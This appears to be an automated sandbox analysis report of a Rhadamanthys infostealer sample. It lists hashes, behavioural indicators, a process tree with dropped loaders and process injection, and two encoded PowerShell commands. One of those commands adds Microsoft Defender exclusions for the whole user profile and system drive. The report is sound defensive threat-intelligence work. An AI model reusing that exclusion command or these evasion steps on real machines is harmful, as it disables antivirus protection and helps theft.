Analysis
-
max time kernel
115s -
max time network
145s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
05-04-2024 01:05
Static task
static1
Behavioral task
behavioral1
Sample
0518892b68d9401cee558e0615322ba2a902d759e36b315a55fe7238aff71d72.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
0518892b68d9401cee558e0615322ba2a902d759e36b315a55fe7238aff71d72.exe
Resource
win10v2004-20240226-en
General
-
Target
0518892b68d9401cee558e0615322ba2a902d759e36b315a55fe7238aff71d72.exe
-
Size
597KB
-
MD5
d6abeeea631ceedc9704b11198ddb305
-
SHA1
32c3d810eef2eefa3e317001657f6e5beb839080
-
SHA256
0518892b68d9401cee558e0615322ba2a902d759e36b315a55fe7238aff71d72
-
SHA512
b648a43f3fd6bf9c5594b8d0fa882eacd5714d2b69d295ef8c749ef5cae81846ed148034cc9cbc46912fdc959d83f4d9e9f822552f5ddba5a45c1d4e4150d876
-
SSDEEP
12288:pjImsaOOmzPgf/zaUR58rAfTFIg4biQN9Az+I:pjqOmzIDaG58UfTFwnP
Malware Config
Signatures
-
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
svchost.exedescription pid process target process PID 2504 created 2364 2504 svchost.exe sihost.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
0518892b68d9401cee558e0615322ba2a902d759e36b315a55fe7238aff71d72.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\Control Panel\International\Geo\Nation 0518892b68d9401cee558e0615322ba2a902d759e36b315a55fe7238aff71d72.exe -
Executes dropped EXE 2 IoCs
Processes:
XWormLoader.exesvchost.exepid process 4900 XWormLoader.exe 2504 svchost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 2564 4900 WerFault.exe XWormLoader.exe -
Suspicious behavior: EnumeratesProcesses 12 IoCs
Processes:
svchost.exepowershell.exepowershell.exedialer.exepid process 2504 svchost.exe 2504 svchost.exe 112 powershell.exe 112 powershell.exe 3544 powershell.exe 3544 powershell.exe 1664 dialer.exe 1664 dialer.exe 1664 dialer.exe 1664 dialer.exe 112 powershell.exe 3544 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 3544 powershell.exe Token: SeDebugPrivilege 112 powershell.exe -
Suspicious use of WriteProcessMemory 17 IoCs
Processes:
0518892b68d9401cee558e0615322ba2a902d759e36b315a55fe7238aff71d72.exesvchost.exedescription pid process target process PID 3556 wrote to memory of 3544 3556 0518892b68d9401cee558e0615322ba2a902d759e36b315a55fe7238aff71d72.exe powershell.exe PID 3556 wrote to memory of 3544 3556 0518892b68d9401cee558e0615322ba2a902d759e36b315a55fe7238aff71d72.exe powershell.exe PID 3556 wrote to memory of 3544 3556 0518892b68d9401cee558e0615322ba2a902d759e36b315a55fe7238aff71d72.exe powershell.exe PID 3556 wrote to memory of 112 3556 0518892b68d9401cee558e0615322ba2a902d759e36b315a55fe7238aff71d72.exe powershell.exe PID 3556 wrote to memory of 112 3556 0518892b68d9401cee558e0615322ba2a902d759e36b315a55fe7238aff71d72.exe powershell.exe PID 3556 wrote to memory of 112 3556 0518892b68d9401cee558e0615322ba2a902d759e36b315a55fe7238aff71d72.exe powershell.exe PID 3556 wrote to memory of 4900 3556 0518892b68d9401cee558e0615322ba2a902d759e36b315a55fe7238aff71d72.exe XWormLoader.exe PID 3556 wrote to memory of 4900 3556 0518892b68d9401cee558e0615322ba2a902d759e36b315a55fe7238aff71d72.exe XWormLoader.exe PID 3556 wrote to memory of 4900 3556 0518892b68d9401cee558e0615322ba2a902d759e36b315a55fe7238aff71d72.exe XWormLoader.exe PID 3556 wrote to memory of 2504 3556 0518892b68d9401cee558e0615322ba2a902d759e36b315a55fe7238aff71d72.exe svchost.exe PID 3556 wrote to memory of 2504 3556 0518892b68d9401cee558e0615322ba2a902d759e36b315a55fe7238aff71d72.exe svchost.exe PID 3556 wrote to memory of 2504 3556 0518892b68d9401cee558e0615322ba2a902d759e36b315a55fe7238aff71d72.exe svchost.exe PID 2504 wrote to memory of 1664 2504 svchost.exe dialer.exe PID 2504 wrote to memory of 1664 2504 svchost.exe dialer.exe PID 2504 wrote to memory of 1664 2504 svchost.exe dialer.exe PID 2504 wrote to memory of 1664 2504 svchost.exe dialer.exe PID 2504 wrote to memory of 1664 2504 svchost.exe dialer.exe
Processes
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:2364
-
C:\Windows\SysWOW64\dialer.exe"C:\Windows\system32\dialer.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1664
-
-
C:\Users\Admin\AppData\Local\Temp\0518892b68d9401cee558e0615322ba2a902d759e36b315a55fe7238aff71d72.exe"C:\Users\Admin\AppData\Local\Temp\0518892b68d9401cee558e0615322ba2a902d759e36b315a55fe7238aff71d72.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3556 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHYAaQBzACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHgAZgBzACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAVABoAGUAIABsAGkAYwBlAG4AcwBlACAAaABhAHMAIABlAHgAcABpAHIAZQBkAC4AIABDAG8AbgB0AGEAYwB0ACAAdQBzACAAdgBpAGEAIAB0AGUAbABlAGcAcgBhAG0AIAB0AG8AIABwAHUAcgBjAGgAYQBzAGUAIAAvACAAZwBlAHQAIABmAHIAZQBlACAAdAByAGkAYQBsACAAdgBlAHIAcwBpAG8AbgAhACcALAAnACcALAAnAE8ASwAnACwAJwBFAHIAcgBvAHIAJwApADwAIwBjAG4AaQAjAD4A"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3544
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGoAaQB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG0AcgBoACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAagBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAcABnACMAPgA="2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:112
-
-
C:\Users\Admin\AppData\Local\Temp\XWormLoader.exe"C:\Users\Admin\AppData\Local\Temp\XWormLoader.exe"2⤵
- Executes dropped EXE
PID:4900 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4900 -s 8843⤵
- Program crash
PID:2564
-
-
-
C:\Users\Admin\AppData\Local\Temp\svchost.exe"C:\Users\Admin\AppData\Local\Temp\svchost.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2504
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 4900 -ip 49001⤵PID:2204
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4044 --field-trial-handle=2432,i,12161922670941700748,3348345705955601576,262144 --variations-seed-version /prefetch:81⤵PID:2404
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
17KB
MD5c0932eec2abeb657499527e72bdd1c2e
SHA1f03f108ddef7a826c7ee03a2bfa608b92b3afc19
SHA2564ccb7fcea78aabfc03bc2ddbd7771fba9108f89e821814eed8ded6d7e4235542
SHA512b5ac278e291d9d6b5b401ba578d4d395f5f9c50f17d2d4220a4799b081e4f168c643982c72ceccf96fd82a136e40350a88479170cbe30d1a60e8f665136fcab5
-
Filesize
101KB
MD539d81ca537ceb52632fbb2e975c3ee2f
SHA10a3814bd3ccea28b144983daab277d72313524e4
SHA25676c4d61afdebf279316b40e1ca3c56996b16d760aa080d3121d6982f0e61d8e7
SHA51218f7acf9e7b992e95f06ab1c96f017a6e7acde36c1e7c1ff254853a1bfcde65abcdaa797b36071b9349e83aa2c0a45c6dfb2d637c153b53c66fc92066f6d4f9a
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
355KB
MD52ef91bf37b3da8cad6751b665bd4e6af
SHA15c15bbc721f91855388861d378cf9d26a140cead
SHA2565263ecab05efc0fda51526658fdfa446f6108c009b8c2ddc9dd93ba29ea691b7
SHA51216f1846fde3d65413d1c478b59761cb5b74c5fa4556c7234858010efc05e81e305c9054895e388e9de85f6a55d05d6ac0236ed85dcdce3b82b0a82b4986eb2a3